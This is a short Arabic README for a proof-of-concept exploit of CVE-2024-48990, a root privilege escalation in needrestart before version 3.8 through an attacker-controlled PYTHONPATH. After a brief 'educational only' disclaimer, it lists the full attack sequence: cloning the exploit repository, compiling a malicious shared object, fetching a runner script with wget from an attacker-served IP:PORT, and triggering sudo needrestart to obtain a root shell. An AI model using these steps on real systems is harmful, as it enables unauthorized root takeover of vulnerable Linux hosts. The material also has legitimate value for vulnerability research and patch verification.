
PoC حول CVE-2024-48990. اكتشفت Qualys أن needrestart، قبل الإصدار 3.8، يسمح للمهاجمين المحليين بتنفيذ تعليمات برمجية عشوائية بصلاحيات الجذر (root) عن طريق خداع needrestart لتشغيل مترجم بايثون مع متغير بيئة PYTHONPATH يتحكم فيه المهاجم. (NIST)
[!WARNING] هذه الملفات والمعلومات مخصّصة للأغراض التعليمية فقط. المؤلف غير مسؤول عن أي سلوك خبيث. جميع المعلومات المقدّمة لا تهدف إلى التحريض على أي نوع من الجرائم أو الانتهاكات.
اكتشفت Qualys أن needrestart، قبل الإصدار 3.8، يسمح للمهاجمين المحليين بتنفيذ كود تعسفي بصلاحيات الجذر عن طريق خداع needrestart لتشغيل مفسّر بايثون مع متغير بيئة PYTHONPATH يتحكم فيه المهاجم. راجع NIST للحصول على التفاصيل الرسمية.
git clone https://github.com/grecosamuel/CVE-2024-48990.git
gcc -shared -fPIC -o __init__.so exploit.c
python3 -m http.server
wget http://IP:PORT/runner.sh
chmod +x runner.sh
./runner.sh
sudo needrestart
عند ظهور [*] CVE module created اضغط CTRL+C لإيقاف العملية واحصل على الشل!